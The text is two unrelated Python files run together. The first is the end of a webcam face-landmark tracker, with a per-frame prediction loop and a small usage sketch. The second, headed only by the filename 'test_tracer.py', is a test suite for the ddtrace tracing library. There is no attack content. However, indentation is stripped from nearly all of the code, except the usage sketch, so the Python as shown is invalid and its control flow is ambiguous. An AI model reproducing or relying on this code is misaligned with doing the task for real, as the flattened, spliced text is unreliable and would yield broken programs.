adjusted_results.append((conf - conf_adjust, (lms, eye_state)))
result_coords.append(np.array(lms)[:, 0:2].mean(0))
results = adjusted_results
candidates = [[] for _ in range(self.max_faces)]  # one independent candidate list per face slot
max_dist = 2 * np.linalg.norm(np.array([self.width, self.height]))
for i, face_info in enumerate(self.face_info):
for j, coord in enumerate(result_coords):
if face_info.coord is None:
candidates[i].append((max_dist, i, j))
else:
candidates[i].append((np.linalg.norm(face_info.coord - coord), i, j))
for i, candidate in enumerate(candidates):
candidates[i] = sorted(candidate)
found = 0
target = len(results)
used_results = {}
used_faces = {}
while found < target:
min_list = min(candidates)
candidate = min_list.pop(0)
face_idx = candidate[1]
result_idx = candidate[2]
if not result_idx in used_results and not face_idx in used_faces:
self.face_info[face_idx].update(results[result_idx], result_coords[result_idx], self.frame_count)
min_list.clear()
used_results[result_idx] = True
used_faces[face_idx] = True
found += 1
if len(min_list) == 0:
min_list.append((2 * max_dist, face_idx, result_idx))
for face_info in self.face_info:
if face_info.frame_count != self.frame_count:
face_info.update(None, None, self.frame_count)
def predict(self, frame, additional_faces=[]):
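# Main per-frame entry point. Depending on the tracking state, face candidates come from the
# RetinaFace detector, the built-in heatmap detector, previously tracked bounding boxes, or the
# caller-provided additional_faces. Each candidate region is cropped, preprocessed and run
# through the landmark model (in worker threads when several crops are pending), overlapping
# results are grouped with only the best per group kept, results are assigned to FaceInfo
# slots, and head pose plus 3D landmarks are estimated for every live face. Returns the list
# of tracked FaceInfo objects, sorted by id.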
self.frame_count += 1
start = time.perf_counter()
im = frame
duration_fd = 0.0
duration_pp = 0.0
duration_model = 0.0
duration_pnp = 0.0
new_faces = []
new_faces.extend(self.faces)
bonus_cutoff = len(self.faces)
new_faces.extend(additional_faces)
self.wait_count += 1
if self.detected == 0:
start_fd = time.perf_counter()
if self.use_retinaface > 0 or self.try_hard:
retinaface_detections = self.retinaface.detect_retina(frame)
new_faces.extend(retinaface_detections)
if self.use_retinaface == 0 or self.try_hard:
new_faces.extend(self.detect_faces(frame))
if self.try_hard:
new_faces.extend([(0, 0, self.width, self.height)])
duration_fd = 1000 * (time.perf_counter() - start_fd)
self.wait_count = 0
elif self.detected < self.max_faces:
if self.use_retinaface > 0:
new_faces.extend(self.retinaface_scan.get_results())
if self.wait_count >= self.scan_every:
if self.use_retinaface > 0:
self.retinaface_scan.background_detect(frame)
else:
start_fd = time.perf_counter()
new_faces.extend(self.detect_faces(frame))
duration_fd = 1000 * (time.perf_counter() - start_fd)
self.wait_count = 0
else:
self.wait_count = 0
if len(new_faces) < 1:
duration = (time.perf_counter() - start) * 1000
if not self.silent:
print(f"Took {duration:.2f}ms")
return []
crops = []
crop_info = []
num_crops = 0
for j, (x,y,w,h) in enumerate(new_faces):
crop_x1 = x - int(w * 0.1)
crop_y1 = y - int(h * 0.125)
crop_x2 = x + w + int(w * 0.1)
crop_y2 = y + h + int(h * 0.125)
crop_x1, crop_y1 = clamp_to_im((crop_x1, crop_y1), self.width, self.height)
crop_x2, crop_y2 = clamp_to_im((crop_x2, crop_y2), self.width, self.height)
scale_x = float(crop_x2 - crop_x1) / self.res
scale_y = float(crop_y2 - crop_y1) / self.res
if crop_x2 - crop_x1 < 4 or crop_y2 - crop_y1 < 4:
continue
start_pp = time.perf_counter()
crop = self.preprocess(im, (crop_x1, crop_y1, crop_x2, crop_y2))
duration_pp += 1000 * (time.perf_counter() - start_pp)
crops.append(crop)
crop_info.append((crop_x1, crop_y1, scale_x, scale_y, 0.0 if j >= bonus_cutoff else 0.1))
num_crops += 1
start_model = time.perf_counter()
outputs = {}
if num_crops == 1:
output = self.session.run([], {self.input_name: crops[0]})[0]
conf, lms = self.landmarks(output[0], crop_info[0])
if conf > self.threshold:
try:
eye_state = self.get_eye_state(frame, lms)
except Exception:
eye_state = [(1.0, 0.0, 0.0, 0.0), (1.0, 0.0, 0.0, 0.0)]
outputs[crop_info[0]] = (conf, (lms, eye_state), 0)
else:
started = 0
results = queue.Queue()
for i in range(min(num_crops, self.max_workers)):
thread = threading.Thread(target=worker_thread, args=(self.sessions[started], frame, crops[started], crop_info[started], results, self.input_name, started, self))
started += 1
thread.start()
returned = 0
while returned < num_crops:
result = results.get(True)
if len(result) != 1:
session, conf, lms, sample_crop_info, idx = result
outputs[sample_crop_info] = (conf, lms, idx)
else:
session = result[0]
returned += 1
if started < num_crops:
thread = threading.Thread(target=worker_thread, args=(session, frame, crops[started], crop_info[started], results, self.input_name, started, self))
started += 1
thread.start()
actual_faces = []
good_crops = []
for crop in crop_info:
if crop not in outputs:
continue
conf, lms, i = outputs[crop]
x1, y1, _ = lms[0].min(0)
x2, y2, _ = lms[0].max(0)
bb = (x1, y1, x2 - x1, y2 - y1)
outputs[crop] = (conf, lms, i, bb)
actual_faces.append(bb)
good_crops.append(crop)
groups = group_rects(actual_faces)
best_results = {}
for crop in good_crops:
conf, lms, i, bb = outputs[crop]
if conf < self.threshold:
continue
group_id = groups[str(bb)][0]
if not group_id in best_results:
best_results[group_id] = [-1, [], 0]
if conf > self.threshold and best_results[group_id][0] < conf + crop[4]:
best_results[group_id][0] = conf + crop[4]
best_results[group_id][1] = lms
best_results[group_id][2] = crop[4]
sorted_results = sorted(best_results.values(), key=lambda x: x[0], reverse=True)[:self.max_faces]
self.assign_face_info(sorted_results)
duration_model = 1000 * (time.perf_counter() - start_model)
results = []
detected = []
start_pnp = time.perf_counter()
for face_info in self.face_info:
if face_info.alive and face_info.conf > self.threshold:
face_info.success, face_info.quaternion, face_info.euler, face_info.pnp_error, face_info.pts_3d, face_info.lms = self.estimate_depth(face_info)
face_info.adjust_3d()
lms = face_info.lms[:, 0:2]
x1, y1 = tuple(lms[0:66].min(0))
x2, y2 = tuple(lms[0:66].max(0))
bbox = (y1, x1, y2 - y1, x2 - x1)
face_info.bbox = bbox
detected.append(bbox)
results.append(face_info)
duration_pnp += 1000 * (time.perf_counter() - start_pnp)
if len(detected) > 0:
self.detected = len(detected)
self.faces = detected
self.discard = 0
else:
self.detected = 0
self.discard += 1
if self.discard > self.discard_after:
self.faces = []
else:
if self.bbox_growth > 0:
faces = []
for (x,y,w,h) in self.faces:
x -= w * self.bbox_growth
y -= h * self.bbox_growth
w += 2 * w * self.bbox_growth
h += 2 * h * self.bbox_growth
faces.append((x,y,w,h))
self.faces = faces
self.faces = [x for x in self.faces if not np.isnan(np.array(x)).any()]
self.detected = len(self.faces)
duration = (time.perf_counter() - start) * 1000
if not self.silent:
print(f"Took {duration:.2f}ms (detect: {duration_fd:.2f}ms, crop: {duration_pp:.2f}ms, track: {duration_model:.2f}ms, 3D points: {duration_pnp:.2f}ms)")
results = sorted(results, key=lambda x: x.id)
return results
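# Minimal usage sketch, not part of the tracker itself: it assumes an OpenCV-compatible webcam
# at index 0 and that the model files are resolvable from the default models directory, and it
# simply prints the id, head pose and confidence of every tracked face.
if __name__ == "__main__":
    cap = cv2.VideoCapture(0)
    ok, first = cap.read()
    if ok:
        height, width = first.shape[0:2]
        tracker = Tracker(width, height, max_faces=1, silent=True)
        for _ in range(300):  # roughly ten seconds of video at 30 fps
            ok, frame = cap.read()
            if not ok:
                break
            for face in tracker.predict(frame):
                print(face.id, face.euler, face.conf)
    cap.release()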
test_tracer.py
# -*- coding: utf-8 -*-
"""
tests for Tracer and utilities.
"""
import contextlib
import multiprocessing
import os
from os import getpid
import threading
from unittest.case import SkipTest
import warnings
import mock
import pytest
import six
import ddtrace
from ddtrace.constants import ENV_KEY
from ddtrace.constants import HOSTNAME_KEY
from ddtrace.constants import MANUAL_DROP_KEY
from ddtrace.constants import MANUAL_KEEP_KEY
from ddtrace.constants import ORIGIN_KEY
from ddtrace.constants import SAMPLING_PRIORITY_KEY
from ddtrace.constants import VERSION_KEY
from ddtrace.context import Context
from ddtrace.ext import priority
from ddtrace.ext import system
from ddtrace.internal.writer import AgentWriter
from ddtrace.internal.writer import LogWriter
from ddtrace.settings import Config
from ddtrace.tracer import Tracer
from ddtrace.tracer import _has_aws_lambda_agent_extension
from ddtrace.tracer import _in_aws_lambda
from tests.subprocesstest import run_in_subprocess
from tests.utils import TracerTestCase
from tests.utils import override_global_config
from ..utils import override_env
class TracerTestCases(TracerTestCase):
def test_tracer_vars(self):
span = self.trace("a", service="s", resource="r", span_type="t")
span.assert_matches(name="a", service="s", resource="r", span_type="t")
# DEV: Finish to ensure we don't leak `service` between spans
span.finish()
span = self.trace("a")
span.assert_matches(name="a", service=None, resource="a", span_type=None)
span.finish()
def test_tracer(self):
def _mix():
with self.trace("cake.mix"):
pass
def _bake():
with self.trace("cake.bake"):
pass
def _make_cake():
with self.trace("cake.make") as span:
span.service = "baker"
span.resource = "cake"
_mix()
_bake()
# let's run it and make sure all is well.
self.assert_has_no_spans()
_make_cake()
# Capture root's trace id to assert later
root_trace_id = self.get_root_span().trace_id
# Assert structure of this trace
self.assert_structure(
# Root span with 2 children
dict(name="cake.make", resource="cake", service="baker", parent_id=None),
(
# Span with no children
dict(name="cake.mix", resource="cake.mix", service="baker"),
# Span with no children
dict(name="cake.bake", resource="cake.bake", service="baker"),
),
)
# do it again and make sure it has new trace ids
self.reset()
_make_cake()
self.assert_span_count(3)
for s in self.spans:
assert s.trace_id != root_trace_id
def test_tracer_wrap(self):
@self.tracer.wrap("decorated_function", service="s", resource="r", span_type="t")
def f(tag_name, tag_value):
# make sure we can still set tags
span = self.tracer.current_span()
span.set_tag(tag_name, tag_value)
f("a", "b")
self.assert_span_count(1)
span = self.get_root_span()
span.assert_matches(
name="decorated_function",
service="s",
resource="r",
span_type="t",
meta=dict(a="b"),
)
def test_tracer_pid(self):
with self.trace("root") as root_span:
with self.trace("child") as child_span:
pass
# Root span should contain the pid of the current process
root_span.assert_metrics({system.PID: getpid()}, exact=False)
# Child span should not contain a pid tag
child_span.assert_metrics(dict(), exact=True)
def test_tracer_wrap_default_name(self):
@self.tracer.wrap()
def f():
pass
f()
self.assert_structure(dict(name="tests.tracer.test_tracer.f"))
def test_tracer_wrap_exception(self):
@self.tracer.wrap()
def f():
raise Exception("bim")
with self.assertRaises(Exception) as ex:
f()
self.assert_structure(
dict(
name="tests.test_tracer.f",
error=1,
meta={
"error.msg": ex.message,
"error.type": ex.__class__.__name__,
},
),
)
def test_tracer_wrap_multiple_calls(self):
@self.tracer.wrap()
def f():
pass
f()
f()
self.assert_span_count(2)
assert self.spans[0].span_id != self.spans[1].span_id
def test_tracer_wrap_span_nesting_current_root_span(self):
@self.tracer.wrap("inner")
def inner():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
@self.tracer.wrap("outer")
def outer():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
with self.trace("mid"):
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
inner()
outer()
def test_tracer_wrap_span_nesting(self):
@self.tracer.wrap("inner")
def inner():
pass
@self.tracer.wrap("outer")
def outer():
with self.trace("mid"):
inner()
outer()
self.assert_span_count(3)
self.assert_structure(
dict(name="outer"),
((dict(name="mid"), (dict(name="inner"),)),),
)
def test_tracer_wrap_class(self):
class Foo(object):
@staticmethod
@self.tracer.wrap()
def s():
return 1
@classmethod
@self.tracer.wrap()
def c(cls):
return 2
@self.tracer.wrap()
def i(cls):
return 3
f = Foo()
self.assertEqual(f.s(), 1)
self.assertEqual(f.c(), 2)
self.assertEqual(f.i(), 3)
self.assert_span_count(3)
self.spans[0].assert_matches(name="tests.tracer.test_tracer.s")
self.spans[1].assert_matches(name="tests.tracer.test_tracer.c")
self.spans[2].assert_matches(name="tests.tracer.test_tracer.i")
def test_tracer_wrap_factory(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
wrapped_function(42, kw_param=42)
self.assert_span_count(1)
self.spans[0].assert_matches(
name="wrap.overwrite",
meta=dict(args="(42,)", kwargs="{'kw_param': 42}"),
)
def test_tracer_wrap_factory_nested(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
with self.trace("wrap.parent", service="webserver"):
wrapped_function(42, kw_param=42)
self.assert_structure(
dict(name="wrap.parent", service="webserver"),
(dict(name="wrap.overwrite", service="webserver", meta=dict(args="(42,)", kwargs="{'kw_param': 42}")),),
)
def test_tracer_disabled(self):
self.tracer.enabled = True
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_spans()
self.reset()
self.tracer.enabled = False
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_no_spans()
def test_unserializable_span_with_finish(self):
try:
import numpy as np
except ImportError:
raise SkipTest("numpy not installed")
# a weird case where manually calling finish with an unserializable
# span was causing a loop of serialization.
with self.trace("parent") as span:
span.metrics["as"] = np.int64(1) # circumvent the data checks
span.finish()
def test_tracer_disabled_mem_leak(self):
# ensure that if the tracer is disabled, we still remove things from the
# span buffer upon finishing.
self.tracer.enabled = False
s1 = self.trace("foo")
s1.finish()
p1 = self.tracer.current_span()
s2 = self.trace("bar")
self.assertIsNone(s2._parent)
s2.finish()
self.assertIsNone(p1)
def test_tracer_global_tags(self):
s1 = self.trace("brie")
s1.finish()
self.assertIsNone(s1.get_tag("env"))
self.assertIsNone(s1.get_tag("other"))
self.tracer.set_tags({"env": "prod"})
s2 = self.trace("camembert")
s2.finish()
self.assertEqual(s2.get_tag("env"), "prod")
self.assertIsNone(s2.get_tag("other"))
self.tracer.set_tags({"env": "staging", "other": "tag"})
s3 = self.trace("gruyere")
s3.finish()
self.assertEqual(s3.get_tag("env"), "staging")
self.assertEqual(s3.get_tag("other"), "tag")
def test_global_context(self):
# the tracer uses a global thread-local Context
span = self.trace("fake_span")
ctx = self.tracer.current_trace_context()
assert ctx.trace_id == span.trace_id
assert ctx.span_id == span.span_id
def test_tracer_current_span(self):
# the current span is in the local Context()
span = self.trace("fake_span")
assert self.tracer.current_span() == span
span.finish()
with self.trace("fake_span") as span:
assert self.tracer.current_span() == span
def test_tracer_current_span_missing_context(self):
self.assertIsNone(self.tracer.current_span())
def test_tracer_current_root_span_missing_context(self):
self.assertIsNone(self.tracer.current_root_span())
def test_default_provider_get(self):
ctx = self.tracer.context_provider.active()
assert ctx is None
def test_default_provider_set(self):
# The Context Provider can set the current active Context;
# this could happen in distributed tracing
ctx = Context(trace_id=42, span_id=100)
self.tracer.context_provider.activate(ctx)
span = self.trace("web.request")
span.assert_matches(name="web.request", trace_id=42, parent_id=100)
def test_start_span(self):
# it should create a root Span
span = self.tracer.start_span("web.request")
assert span.name == "web.request"
assert span.parent_id is None
span.finish()
spans = self.pop_spans()
assert len(spans) == 1
assert spans[0] is span
def test_start_span_optional(self):
# it should create a root Span with arguments
with self.start_span("web.request", service="web", resource="/", span_type="http") as span:
pass
span.assert_matches(
name="web.request",
service="web",
resource="/",
span_type="http",
)
def test_start_span_service_default(self):
span = self.start_span("")
span.assert_matches(service=None)
span.finish()
def test_start_span_service_from_parent(self):
with self.start_span("parent", service="mysvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="mysvc",
)
def test_start_span_service_global_config(self):
# When no service is provided, the globally configured default is used
with self.override_global_config(dict(service="mysvc")):
with self.start_span("") as span:
span.assert_matches(service="mysvc")
def test_start_span_service_global_config_parent(self):
# Parent should have precedence over global config
with self.override_global_config(dict(service="mysvc")):
with self.start_span("parent", service="parentsvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="parentsvc",
)
def test_start_child_span(self):
# it should create a child Span for the given parent
with self.start_span("web.request") as parent:
assert self.tracer.current_span() is None
with self.start_span("web.worker", child_of=parent) as child:
assert self.tracer.current_span() is None
parent.assert_matches(
name="web.request",
parent_id=None,
_parent=None,
tracer=self.tracer,
)
child.assert_matches(
name="web.worker",
parent_id=parent.span_id,
_parent=parent,
tracer=self.tracer,
)
def test_start_child_span_attributes(self):
# it should create a child Span with parent's attributes
with self.start_span("web.request", service="web", resource="/", span_type="http") as parent:
with self.start_span("web.worker", child_of=parent) as child:
child.assert_matches(name="web.worker", service="web")
def test_start_child_from_context(self):
# it should create a child span with a populated Context
with self.start_span("web.request") as root:
with self.start_span("web.worker", child_of=root.context) as child:
pass
child.assert_matches(
name="web.worker",
parent_id=root.span_id,
trace_id=root.trace_id,
_parent=None,
tracer=self.tracer,
)
def test_adding_services(self):
assert self.tracer._services == set()
with self.start_span("root", service="one") as root:
assert self.tracer._services == set(["one"])
with self.start_span("child", service="two", child_of=root):
pass
assert self.tracer._services == set(["one", "two"])
def test_configure_dogstatsd_url_host_port(self):
tracer = Tracer()
tracer.configure(dogstatsd_url="foo:1234")
assert tracer.writer.dogstatsd.host == "foo"
assert tracer.writer.dogstatsd.port == 1234
tracer = Tracer()
writer = AgentWriter("http://localhost:8126")
tracer.configure(writer=writer, dogstatsd_url="foo:1234")
assert tracer.writer.dogstatsd.host == "foo"
assert tracer.writer.dogstatsd.port == 1234
def test_configure_dogstatsd_url_socket(self):
tracer = Tracer()
tracer.configure(dogstatsd_url="unix:///foo.sock")
assert tracer.writer.dogstatsd.host is None
assert tracer.writer.dogstatsd.port is None
assert tracer.writer.dogstatsd.socket_path == "/foo.sock"
tracer = Tracer()
writer = AgentWriter("http://localhost:8126")
tracer.configure(writer=writer, dogstatsd_url="unix:///foo.sock")
assert tracer.writer.dogstatsd.host is None
assert tracer.writer.dogstatsd.port is None
assert tracer.writer.dogstatsd.socket_path == "/foo.sock"
def test_tracer_url():
t = ddtrace.Tracer()
assert t.writer.agent_url == "http://localhost:8126"
t = ddtrace.Tracer(url="http://foobar:12")
assert t.writer.agent_url == "http://foobar:12"
t = ddtrace.Tracer(url="unix:///foobar")
assert t.writer.agent_url == "unix:///foobar"
t = ddtrace.Tracer(url="http://localhost")
assert t.writer.agent_url == "http://localhost"
t = ddtrace.Tracer(url="https://localhost")
assert t.writer.agent_url == "https://localhost"
with pytest.raises(ValueError) as e:
ddtrace.Tracer(url="foo://foobar:12")
assert (
str(e.value) == "Unsupported protocol 'foo' in Agent URL 'foo://foobar:12'. Must be one of: http, https, unix"
)
def test_tracer_shutdown_no_timeout():
t = ddtrace.Tracer()
writer = mock.Mock(wraps=t.writer)
t.writer = writer
# The writer thread does not start until the first write.
t.shutdown()
assert t.writer.stop.called
assert not t.writer.join.called
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
# Do a write to start the writer.
with t.trace("something"):
pass
(w,) = ws
assert issubclass(w.category, DeprecationWarning)
assert (
str(w.message) == "Tracing with a tracer that has been shut down is being deprecated. "
"A new tracer should be created for generating new traces in version '1.0.0'"
)
with t.trace("something"):
pass
t.shutdown()
t.writer.stop.assert_has_calls(
[
mock.call(timeout=None),
mock.call(timeout=None),
]
)
def test_tracer_configure_writer_stop_unstarted():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Stop should be called when replacing the writer.
t.configure(hostname="localhost", port=8126)
assert orig_writer.stop.called
def test_tracer_configure_writer_stop_started():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Do a write to start the writer
with t.trace("something"):
pass
t.configure(hostname="localhost", port=8126)
orig_writer.stop.assert_called_once_with()
def test_tracer_shutdown_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
with t.trace("something"):
pass
t.shutdown(timeout=2)
t.writer.stop.assert_called_once_with(timeout=2)
def test_tracer_dogstatsd_url():
t = ddtrace.Tracer()
assert t.writer.dogstatsd.host == "localhost"
assert t.writer.dogstatsd.port == 8125
t = ddtrace.Tracer(dogstatsd_url="foobar:12")
assert t.writer.dogstatsd.host == "foobar"
assert t.writer.dogstatsd.port == 12
t = ddtrace.Tracer(dogstatsd_url="udp://foobar:12")
assert t.writer.dogstatsd.host == "foobar"
assert t.writer.dogstatsd.port == 12
t = ddtrace.Tracer(dogstatsd_url="/var/run/statsd.sock")
assert t.writer.dogstatsd.socket_path == "/var/run/statsd.sock"
t = ddtrace.Tracer(dogstatsd_url="unix:///var/run/statsd.sock")
assert t.writer.dogstatsd.socket_path == "/var/run/statsd.sock"
with pytest.raises(ValueError) as e:
t = ddtrace.Tracer(dogstatsd_url="foo://foobar:12")
assert str(e) == "Unknown url format for `foo://foobar:12`"
def test_tracer_fork():
t = ddtrace.Tracer()
original_pid = t._pid
original_writer = t.writer
@contextlib.contextmanager
def capture_failures(errors):
try:
yield
except AssertionError as e:
errors.put(e)
def task(t, errors):
# Start a new span to trigger process checking
with t.trace("test", service="test"):
# Assert we recreated the writer and have a new queue
with capture_failures(errors):
assert t._pid != original_pid
assert t.writer is not original_writer
assert t.writer._encoder is not original_writer._encoder
# Assert the trace got written into the correct queue
assert len(original_writer._encoder) == 0
assert len(t.writer._encoder) == 1
# Assert tracer in a new process correctly recreates the writer
errors = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(t, errors))
try:
p.start()
finally:
p.join(timeout=2)
assert errors.empty(), errors.get()
# Ensure writing into the tracer in this process still works as expected
with t.trace("test", service="test"):
assert t._pid == original_pid
assert t.writer == original_writer
assert t.writer._encoder == original_writer._encoder
# Assert the trace got written into the correct queue
assert len(original_writer._encoder) == 1
assert len(t.writer._encoder) == 1
def test_tracer_with_version():
t = ddtrace.Tracer()
# With global `config.version` defined
with override_global_config(dict(version="1.2.3")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "1.2.3"
# override manually
span.set_tag(VERSION_KEY, "4.5.6")
assert span.get_tag(VERSION_KEY) == "4.5.6"
# With no `config.version` defined
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) is None
# explicitly set in the span
span.set_tag(VERSION_KEY, "1.2.3")
assert span.get_tag(VERSION_KEY) == "1.2.3"
# With global tags set
t.set_tags({VERSION_KEY: "tags.version"})
with override_global_config(dict(version="config.version")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "config.version"
def test_tracer_with_env():
t = ddtrace.Tracer()
# With global `config.env` defined
with override_global_config(dict(env="prod")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "prod"
# override manually
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With no `config.env` defined
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) is None
# explicitly set in the span
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With global tags set
t.set_tags({ENV_KEY: "tags.env"})
with override_global_config(dict(env="config.env")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "config.env"
class EnvTracerTestCase(TracerTestCase):
"""Tracer test cases requiring environment variables."""
@run_in_subprocess(env_overrides=dict(DATADOG_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DATADOG_SERVICE_NAME(self):
"""
When DATADOG_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DD_SERVICE_NAME(self):
"""
When DD_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env(self):
with self.start_span("") as span:
pass
span.assert_matches(
service="mysvc",
)
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env_global_config(self):
# Global config should have higher precedence than the environment variable
with self.override_global_config(dict(service="overridesvc")):
with self.start_span("") as span:
pass
span.assert_matches(
service="overridesvc",
)
@run_in_subprocess(env_overrides=dict(DD_VERSION="0.1.2"))
def test_version_no_global_service(self):
# Version should be set if no service name is present
with self.trace("") as span:
span.assert_matches(
meta={
VERSION_KEY: "0.1.2",
},
)
# The version will not be tagged if the service is not globally
# configured.
with self.trace("root", service="rootsvc") as root:
assert VERSION_KEY not in root.meta
with self.trace("child") as span:
assert VERSION_KEY not in span.meta
@run_in_subprocess(env_overrides=dict(DD_SERVICE="django", DD_VERSION="0.1.2"))
def test_version_service(self):
# Fleshed out example of service and version tagging
# Our app is called django, we provide DD_SERVICE=django and DD_VERSION=0.1.2
with self.trace("django.request") as root:
# Root span should be tagged
assert root.service == "django"
assert VERSION_KEY in root.meta and root.meta[VERSION_KEY] == "0.1.2"
# Child spans should be tagged
with self.trace("") as child1:
assert child1.service == "django"
assert VERSION_KEY in child1.meta and child1.meta[VERSION_KEY] == "0.1.2"
# Version should not be applied to spans of a service that isn't user-defined
with self.trace("mysql.query", service="mysql") as span:
assert VERSION_KEY not in span.meta
# Child should also not have a version
with self.trace("") as child2:
assert child2.service == "mysql"
assert VERSION_KEY not in child2.meta
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func"))
def test_detect_agentless_env_with_lambda(self):
assert _in_aws_lambda()
assert not _has_aws_lambda_agent_extension()
tracer = Tracer()
assert isinstance(tracer.writer, LogWriter)
tracer.configure(enabled=True)
assert isinstance(tracer.writer, LogWriter)
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func"))
def test_detect_agent_config_with_lambda_extension(self):
def mock_os_path_exists(path):
return path == "/opt/extensions/datadog-agent"
assert _in_aws_lambda()
with mock.patch("os.path.exists", side_effect=mock_os_path_exists):
assert _has_aws_lambda_agent_extension()
tracer = Tracer()
assert isinstance(tracer.writer, AgentWriter)
assert tracer.writer._sync_mode
tracer.configure(enabled=False)
assert isinstance(tracer.writer, AgentWriter)
assert tracer.writer._sync_mode
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func", DD_AGENT_HOST="localhost"))
def test_detect_agent_config(self):
tracer = Tracer()
assert isinstance(tracer.writer, AgentWriter)
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2"))
def test_dd_tags(self):
assert self.tracer.tags["key1"] == "value1"
assert self.tracer.tags["key2"] == "value2"
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2,key3"))
def test_dd_tags_invalid(self):
assert "key1" in self.tracer.tags
assert "key2" in self.tracer.tags
assert "key3" not in self.tracer.tags
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
assert s.service == "mysvc"
assert s.get_tag("env") == "myenv"
assert s.get_tag("version") == "myvers"
@run_in_subprocess(
env_overrides=dict(
DD_TAGS="service:s,env:e,version:v",
DD_ENV="env",
DD_SERVICE="svc",
DD_VERSION="0.123",
)
)
def test_tags_from_DD_TAGS_precedence(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
assert s.service == "svc"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS_override(self):
t = ddtrace.Tracer()
ddtrace.config.env = "env"
ddtrace.config.service = "service"
ddtrace.config.version = "0.123"
with t.trace("test") as s:
assert s.service == "service"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
def test_tracer_set_runtime_tags():
t = ddtrace.Tracer()
with t.start_span("foobar") as span:
pass
assert len(span.get_tag("runtime-id"))
t2 = ddtrace.Tracer()
with t2.start_span("foobaz") as span2:
pass
assert span.get_tag("runtime-id") == span2.get_tag("runtime-id")
def test_tracer_runtime_tags_fork():
tracer = ddtrace.Tracer()
def task(tracer, q):
span = tracer.start_span("foobaz")
q.put(span.get_tag("runtime-id"))
span.finish()
span = tracer.start_span("foobar")
span.finish()
q = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children_tag = q.get()
assert children_tag != span.get_tag("runtime-id")
def test_tracer_runtime_tags_cross_execution(tracer):
ctx = Context(trace_id=12, span_id=21)
tracer.context_provider.activate(ctx)
with tracer.trace("span") as span:
pass
assert span.get_tag("runtime-id") is not None
assert span.get_metric(system.PID) is not None
def test_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
span = t.start_span("hello")
assert span == result["span"]
span.finish()
def test_deregister_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
t.deregister_on_start_span(store_span)
with t.start_span("hello"):
pass
assert result == {}
def test_enable(monkeypatch):
t1 = ddtrace.Tracer()
assert t1.enabled
monkeypatch.setenv("DD_TRACE_ENABLED", "false")
t2 = ddtrace.Tracer()
assert not t2.enabled
def test_runtime_id_parent_only():
tracer = ddtrace.Tracer()
# Parent spans should have runtime-id
s = tracer.trace("test")
rtid = s.get_tag("runtime-id")
